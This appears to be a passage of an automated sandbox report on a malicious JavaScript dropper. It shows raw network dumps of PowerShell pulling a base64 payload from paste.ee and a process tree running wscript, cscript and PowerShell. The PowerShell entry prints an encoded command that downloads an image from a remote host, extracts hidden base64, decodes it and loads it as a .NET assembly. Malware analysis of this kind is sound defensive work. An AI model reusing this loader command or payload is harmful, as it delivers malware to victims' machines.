                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                            Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                            2024-12-03 09:05:04 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                            Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.449738104.21.84.674437616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-03 09:05:24 UTC67OUTGET /r/5zfAV/0 HTTP/1.1
                                                                                                            Host: paste.ee
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-12-03 09:05:25 UTC1281INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 03 Dec 2024 09:05:25 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=2592000
                                                                                                            strict-transport-security: max-age=63072000
                                                                                                            x-frame-options: DENY
                                                                                                            x-content-type-options: nosniff
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                            CF-Cache-Status: MISS
                                                                                                            Last-Modified: Tue, 03 Dec 2024 09:05:25 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2B7VHJS%2FOJjG%2BFqJs6LJ8NoBjsCdTm8U4sc3aHbDI5eIrobEM74Gm%2Fei2o0GjbtNBaM%2B07RALOKKKEhmnrzedKxgI6t6sCq8hLTRuDcOrAGmAX01oQ8%2B3U0Pug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ec26513db3719ae-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-03 09:05:25 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 37 36 26 6d 69 6e 5f 72 74 74 3d 31 39 37 31 26 72 74 74 5f 76 61 72 3d 37 34 39 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 35 32 30 31 33 26 63 77 6e 64 3d 32 32 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 64 35 37 63 37 63 35 63 33 36 39 36 33 38 66 26 74 73 3d 38 34 34 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1971&rtt_var=749&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1452013&cwnd=227&unsent_bytes=0&cid=cd57c7c5c369638f&ts=844&x=0"
                                                                                                            2024-12-03 09:05:25 UTC1242INData Raw: 33 35 66 39 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                            Data Ascii: 35f9==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 4f 63 4c 52 78 73 75 78 6c 6b 39 70 31 6b 79 49 4d 31 4a 4a 38 36 59 6b 74 63 4d 5a 39 71 44 34 77 6e 74 72 76 57 73 61 58 59 32 39 70 41 57 39 61 6b 65 44 51 72 6e 56 79 4e 51 59 44 4d 69 5a 74 4e 76 4a 57 54 6f 6e 43 56 67 64 39 7a 6a 4c 54 34 35 38 55 7a 47 6f 6c 62 69 56 4b 4f 39 2f 5a 74 31 62 76 41 2f 70 30 4b 74 49 7a 33 6b 37 4e 70 38 5a 4a 73 75 77 4b 50 35 59 52 71 6e 68 43 5a 62 74 6d 69 49 57 55 63 53 66 65 7a 34 4c 69 53 62 43 4a 46 52 50 44 49 68 35 68 63 42 39 78 6f 79 66 34 6c 66 6d 63 79 66 73 75 52 37 41 35 56 4e 37 4c 77 34 4b 44 61 76 74 72 38 58 31 49 6a 52 50 48 48 70 72 4f 50 43 59 53 36 61 72 63 5a 6f 58 75 39 52 48 6e 37 6c 50 33 66 57 2f 68 79 70 34 67 4e 42 38 30 73 31 67 39 71 7a 65 65 6f 54 4b 70 32 6d 30 42 69 43 58 74 4f 30
                                                                                                            Data Ascii: OcLRxsuxlk9p1kyIM1JJ86YktcMZ9qD4wntrvWsaXY29pAW9akeDQrnVyNQYDMiZtNvJWTonCVgd9zjLT458UzGolbiVKO9/Zt1bvA/p0KtIz3k7Np8ZJsuwKP5YRqnhCZbtmiIWUcSfez4LiSbCJFRPDIh5hcB9xoyf4lfmcyfsuR7A5VN7Lw4KDavtr8X1IjRPHHprOPCYS6arcZoXu9RHn7lP3fW/hyp4gNB80s1g9qzeeoTKp2m0BiCXtO0
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 30 55 54 6b 2f 65 4a 71 44 47 64 46 6c 75 4c 51 62 70 31 4d 6a 2b 39 48 38 48 73 63 6f 58 34 70 6c 6b 33 55 61 5a 6b 78 75 39 6c 6d 34 39 46 4c 46 48 42 57 6e 39 5a 78 2b 4c 75 31 39 32 6a 74 63 61 69 55 61 6c 52 39 73 7a 41 4d 79 6a 62 77 58 34 4f 4f 6d 44 51 30 75 70 37 68 37 73 68 38 39 56 64 5a 39 2b 67 34 35 32 44 32 31 4d 55 6f 63 57 5a 4a 44 6a 70 6b 61 73 48 33 59 79 71 34 2f 74 32 76 4c 33 2b 36 34 76 64 7a 4f 6c 79 32 77 6e 78 6d 54 4d 55 7a 48 4b 46 35 45 44 4a 74 42 4a 53 69 7a 63 62 50 37 66 64 39 4e 74 55 78 33 38 6c 5a 4d 5a 34 6d 67 75 53 68 79 51 67 74 66 6d 31 6c 69 6b 62 6d 4e 45 59 35 49 72 4b 41 33 69 6a 55 72 67 62 2f 31 6e 6e 58 5a 35 73 7a 75 6a 38 39 62 31 75 7a 47 5a 31 6e 52 61 7a 51 55 78 69 36 30 79 70 43 4d 6c 2b 78 55 74 54
                                                                                                            Data Ascii: 0UTk/eJqDGdFluLQbp1Mj+9H8HscoX4plk3UaZkxu9lm49FLFHBWn9Zx+Lu192jtcaiUalR9szAMyjbwX4OOmDQ0up7h7sh89VdZ9+g452D21MUocWZJDjpkasH3Yyq4/t2vL3+64vdzOly2wnxmTMUzHKF5EDJtBJSizcbP7fd9NtUx38lZMZ4mguShyQgtfm1likbmNEY5IrKA3ijUrgb/1nnXZ5szuj89b1uzGZ1nRazQUxi60ypCMl+xUtT
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 55 4a 76 31 56 6a 6d 4d 42 35 48 63 73 31 59 70 55 79 64 31 73 64 59 48 6c 4f 4a 6f 6c 32 65 31 76 4a 46 4a 35 71 6e 37 33 58 65 52 48 71 65 6f 65 44 6b 2f 71 4f 4e 4b 62 6e 30 76 5a 67 72 66 35 56 4e 39 47 35 6b 73 55 42 2b 49 2b 75 49 6b 30 7a 57 4c 48 75 59 43 71 6d 4a 70 79 70 6e 51 75 5a 43 50 64 33 4d 57 41 74 79 67 2b 51 38 44 33 7a 44 4e 72 6a 73 54 47 45 6f 2b 6d 63 48 62 41 73 5a 46 30 36 4c 79 44 57 43 64 51 37 53 77 64 61 58 57 79 33 6b 49 52 61 30 33 2f 4d 52 5a 32 6c 77 70 57 36 73 49 6e 55 67 38 54 2f 48 2f 37 76 57 78 52 78 77 5a 47 39 4f 67 76 51 35 50 4f 48 46 53 6a 70 57 68 74 73 38 33 34 50 37 6c 6b 4e 72 73 37 6d 49 61 71 43 45 6a 52 2b 74 5a 4f 53 34 30 77 68 33 46 49 2f 31 6e 77 6a 46 6f 71 42 5a 79 77 69 2b 47 38 55 31 58 4b 6f 32
                                                                                                            Data Ascii: UJv1VjmMB5Hcs1YpUyd1sdYHlOJol2e1vJFJ5qn73XeRHqeoeDk/qONKbn0vZgrf5VN9G5ksUB+I+uIk0zWLHuYCqmJpypnQuZCPd3MWAtyg+Q8D3zDNrjsTGEo+mcHbAsZF06LyDWCdQ7SwdaXWy3kIRa03/MRZ2lwpW6sInUg8T/H/7vWxRxwZG9OgvQ5POHFSjpWhts834P7lkNrs7mIaqCEjR+tZOS40wh3FI/1nwjFoqBZywi+G8U1XKo2
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 4b 76 6d 4b 73 33 31 4d 71 64 47 50 38 4b 4b 66 77 63 44 62 55 49 33 73 2f 70 69 49 6c 43 4d 55 4e 55 51 4a 52 4f 74 4a 4f 7a 30 56 71 37 41 67 4f 49 34 67 73 34 2f 38 59 31 4e 31 53 50 65 4b 77 33 79 61 39 34 6d 66 4c 61 68 50 55 56 46 6e 50 43 55 58 68 37 49 38 55 48 6b 31 55 45 54 6c 2f 6f 59 2b 61 2b 73 58 6a 6f 49 50 48 72 79 5a 50 51 4e 74 42 7a 46 51 36 6f 69 41 7a 30 35 66 75 36 4d 6d 39 6b 39 35 79 59 49 52 75 6c 61 71 44 49 41 2b 73 30 31 34 56 4f 62 36 4b 45 6a 75 77 6e 32 71 72 70 55 43 49 72 53 56 72 63 79 77 79 34 49 51 78 74 4f 48 4b 6c 77 62 65 54 4d 63 6a 50 4f 78 70 74 2f 73 38 46 77 30 31 69 43 49 39 73 50 4a 75 39 76 4d 65 32 51 68 76 50 35 50 6c 6e 6c 48 49 37 62 33 62 2f 67 33 6a 44 47 72 63 2b 2f 72 53 56 4c 49 4a 45 35 2f 55 39 59
                                                                                                            Data Ascii: KvmKs31MqdGP8KKfwcDbUI3s/piIlCMUNUQJROtJOz0Vq7AgOI4gs4/8Y1N1SPeKw3ya94mfLahPUVFnPCUXh7I8UHk1UETl/oY+a+sXjoIPHryZPQNtBzFQ6oiAz05fu6Mm9k95yYIRulaqDIA+s014VOb6KEjuwn2qrpUCIrSVrcywy4IQxtOHKlwbeTMcjPOxpt/s8Fw01iCI9sPJu9vMe2QhvP5PlnlHI7b3b/g3jDGrc+/rSVLIJE5/U9Y
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 62 73 6c 30 35 72 79 4c 6c 30 76 31 2b 51 6f 75 4a 56 35 44 70 42 73 39 72 47 77 50 4e 46 55 56 71 39 54 6f 44 2b 7a 67 73 75 6a 71 4f 46 51 4e 4a 50 6c 6a 34 30 58 79 6f 62 72 52 78 5a 66 4b 75 62 47 59 48 74 6b 38 39 58 4d 30 58 74 4f 6d 6d 61 73 6b 44 64 64 53 50 79 52 43 71 4e 7a 5a 4d 73 56 44 4c 58 30 4b 73 30 70 4a 38 31 4b 31 6a 70 77 59 73 54 6d 68 43 67 5a 73 34 67 55 72 45 38 54 4e 79 46 53 33 5a 37 41 6f 6d 39 44 62 42 61 77 79 6c 59 44 30 37 57 6e 38 51 5a 58 6c 31 33 46 4c 75 34 4f 63 55 4e 39 48 61 6c 5a 41 32 68 4f 66 67 46 78 42 52 42 6d 31 4f 61 53 66 65 6e 72 44 73 39 6e 39 4b 79 57 31 41 54 6d 57 6f 71 50 67 41 52 65 4d 31 4c 70 70 31 35 51 37 4d 57 52 55 32 44 6d 6d 38 6e 77 6f 41 69 67 73 4f 73 62 41 67 4a 41 35 5a 52 30 71 36 74 39
                                                                                                            Data Ascii: bsl05ryLl0v1+QouJV5DpBs9rGwPNFUVq9ToD+zgsujqOFQNJPlj40XyobrRxZfKubGYHtk89XM0XtOmmaskDddSPyRCqNzZMsVDLX0Ks0pJ81K1jpwYsTmhCgZs4gUrE8TNyFS3Z7Aom9DbBawylYD07Wn8QZXl13FLu4OcUN9HalZA2hOfgFxBRBm1OaSfenrDs9n9KyW1ATmWoqPgAReM1Lpp15Q7MWRU2Dmm8nwoAigsOsbAgJA5ZR0q6t9
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 73 36 5a 54 6c 50 68 74 67 36 79 53 50 2f 72 56 52 72 6b 4b 2f 6d 52 4c 59 5a 5a 6f 49 37 42 51 5a 4b 79 36 2f 50 55 57 6e 38 35 5a 33 34 70 56 4d 61 64 7a 72 75 4c 4d 73 67 6d 54 45 5a 4f 7a 5a 79 46 34 79 59 73 59 44 48 34 6e 4d 6f 45 49 2b 49 72 50 34 57 62 71 57 79 6f 6d 4f 6b 4e 44 6d 58 6b 5a 55 73 37 4d 74 54 6a 42 41 69 79 79 72 74 77 4b 59 7a 4a 7a 57 77 32 76 58 66 77 73 4c 55 39 59 79 38 36 52 4a 43 75 33 61 62 79 65 36 57 52 49 70 5a 71 7a 79 76 72 6d 58 49 68 6a 57 34 53 6b 2f 58 37 71 34 4b 7a 70 34 70 6e 76 35 74 34 37 45 6a 4f 49 52 50 46 4e 54 52 33 32 4b 55 52 50 47 38 46 44 6d 57 4b 74 52 46 33 4a 67 34 36 71 74 72 34 32 63 59 62 78 34 2b 35 36 51 56 32 63 6f 42 58 61 36 59 70 58 4b 4f 41 67 48 74 76 58 59 71 73 76 2f 66 53 33 4c 35 72
                                                                                                            Data Ascii: s6ZTlPhtg6ySP/rVRrkK/mRLYZZoI7BQZKy6/PUWn85Z34pVMadzruLMsgmTEZOzZyF4yYsYDH4nMoEI+IrP4WbqWyomOkNDmXkZUs7MtTjBAiyyrtwKYzJzWw2vXfwsLU9Yy86RJCu3abye6WRIpZqzyvrmXIhjW4Sk/X7q4Kzp4pnv5t47EjOIRPFNTR32KURPG8FDmWKtRF3Jg46qtr42cYbx4+56QV2coBXa6YpXKOAgHtvXYqsv/fS3L5r
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 62 4b 42 4a 43 68 4e 70 4f 43 74 74 70 5a 34 75 35 46 4e 7a 66 5a 43 68 72 4e 49 49 74 4d 6b 49 34 62 44 59 75 75 55 70 4b 6c 48 50 79 49 37 68 4f 52 59 50 4a 56 4c 48 5a 74 71 31 59 6d 35 4e 35 58 4c 6d 4b 73 38 72 61 2f 58 32 6a 31 49 54 48 4d 5a 6e 78 54 6e 65 69 42 49 4f 48 6b 7a 58 4c 4f 63 57 69 52 49 43 69 62 6e 66 30 70 49 41 30 62 59 7a 34 38 63 58 41 2f 48 33 46 6d 5a 6a 2b 78 38 38 33 42 31 6b 71 43 72 65 6f 41 2b 4b 5a 47 38 4c 51 63 50 49 70 78 2b 61 33 73 4a 54 37 70 2f 78 36 74 44 5a 42 63 65 55 73 44 58 70 2f 75 5a 55 31 2f 2b 30 63 4f 64 4b 4f 72 62 4c 54 50 35 66 50 76 36 4f 4c 6f 50 6c 36 47 77 6f 58 6a 76 52 57 43 6a 50 79 74 36 33 38 47 6c 57 39 5a 33 59 2f 36 49 39 54 4e 48 32 78 7a 37 42 6f 33 62 56 47 53 52 37 54 53 6e 74 78 77 78
                                                                                                            Data Ascii: bKBJChNpOCttpZ4u5FNzfZChrNIItMkI4bDYuuUpKlHPyI7hORYPJVLHZtq1Ym5N5XLmKs8ra/X2j1ITHMZnxTneiBIOHkzXLOcWiRICibnf0pIA0bYz48cXA/H3FmZj+x883B1kqCreoA+KZG8LQcPIpx+a3sJT7p/x6tDZBceUsDXp/uZU1/+0cOdKOrbLTP5fPv6OLoPl6GwoXjvRWCjPyt638GlW9Z3Y/6I9TNH2xz7Bo3bVGSR7TSntxwx
                                                                                                            2024-12-03 09:05:25 UTC1369INData Raw: 37 6b 65 39 4e 75 41 7a 6e 31 42 2b 4f 47 67 5a 34 53 47 39 57 53 76 6b 4a 79 71 66 47 6b 6d 62 53 64 50 42 34 43 59 47 64 64 68 4c 6a 4b 72 72 68 30 31 58 70 66 67 6c 30 4a 50 56 77 4f 76 65 58 55 42 45 38 54 58 50 33 76 38 79 37 6e 4a 42 78 50 68 6a 32 2b 52 59 45 6e 36 5a 73 38 34 77 56 76 46 69 36 46 74 34 41 52 4c 77 6c 34 4a 62 53 5a 79 52 43 56 52 44 71 79 36 30 6d 4b 63 57 71 5a 45 2b 4c 71 69 55 55 36 56 48 34 38 79 56 47 66 69 55 44 72 71 47 42 6d 37 48 45 67 53 46 34 6e 63 44 76 6d 59 77 4c 6a 51 52 4b 53 63 38 67 6b 6b 77 32 78 77 5a 42 6e 69 4d 47 7a 36 38 53 38 55 63 42 41 64 6a 49 57 67 64 54 36 34 4d 75 70 6f 6d 4b 7a 67 6d 36 74 30 56 70 6e 73 57 41 4f 76 68 37 68 51 5a 2b 57 72 38 44 37 42 61 4c 75 4e 47 6c 56 34 71 31 7a 47 54 5a 42 6d
                                                                                                            Data Ascii: 7ke9NuAzn1B+OGgZ4SG9WSvkJyqfGkmbSdPB4CYGddhLjKrrh01Xpfgl0JPVwOveXUBE8TXP3v8y7nJBxPhj2+RYEn6Zs84wVvFi6Ft4ARLwl4JbSZyRCVRDqy60mKcWqZE+LqiUU6VH48yVGfiUDrqGBm7HEgSF4ncDvmYwLjQRKSc8gkkw2xwZBniMGz68S8UcBAdjIWgdT64MupomKzgm6t0VpnsWAOvh7hQZ+Wr8D7BaLuNGlV4q1zGTZBm


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:04:04:54
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js"
                                                                                                            Imagebase:0x7ff77fac0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:04:04:58
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\cscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js
                                                                                                            Imagebase:0x7ff78bf60000
                                                                                                            File size:161'280 bytes
                                                                                                            MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:04:04:58
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:04:04:58
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvA